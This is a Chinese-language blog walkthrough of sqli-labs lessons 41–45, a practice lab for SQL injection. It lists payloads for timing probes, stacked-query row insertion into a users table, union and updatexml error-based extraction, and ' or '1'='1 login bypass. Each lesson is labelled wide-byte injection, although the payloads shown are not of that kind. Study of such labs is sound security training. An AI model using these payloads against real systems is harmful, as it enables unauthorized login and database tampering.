sqli-labs lesson41-45

  1. lesson-41 宽字节注入

判断注入:

?id=1 and sleep(3)

插入数据:

?id=1;insert  into   users (username,password) values ('44','55');

或union select注入:

-1 union select 1,2,database()

2.lesson-42 宽字节注入

判断注入:

单引号注入

在username除无注入,被 mysqli_real_escape_string函数过滤了

插入数据:

login_user=admin&login_password=555';insert into  users (username,password) values ('55','44');-- +&mysubmit=Login

或报错注入:

login_user=admin&login_password=555' or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&mysubmit=Login

3.lesson-43 宽字节注入

判断注入:

单引号括号注入

插入数据:

login_user=adn&login_password=555');insert into  users (username,password) values ('555','444');-- +&mysubmit=Login

或报错注入

login_user=a&login_password=aaa') or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&mysubmit=Login

4.lesson-44 宽字节注入

判断注入

为单引号注入

没有报错,不可用盲注判断闭合符号,因为是登录时,查用户名和密码,都是不对的,and sleep(3),就不行了

login_user=aaaa&login_password=aa' or '1'='1&mysubmit=Login

闭合为什么不能用-- +,#,因为查的是登录的用户名和密码,是没有这一条数据的,看不出来是否登录成功

闭合还可以用or 1=1#

用or ' ,and '1'='1,and '都不行,or ' 和查询时的用户名和密码都是假的,所以没数据,and '和and '1'='1一样

插入数据:

login_user=aaaa&login_password=aa' ;insert into  users (username,password) values ('55a5','4a44'); or '1'='1&mysubmit=Login

盲注用不了,因为后面的 or '1'='1,闭合后为恒真

5.lesson-45 宽字节注入

判断注入:

单引号加括号

login_user=aaaa&login_password=aa') or ('1')=('1&mysubmit=Login

插入数据:

login_user=aaaa&login_password=aa') ;insert into  users (username,password) values ('55a5','4a44'); or ('1')=('1&mysubmit=Login

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值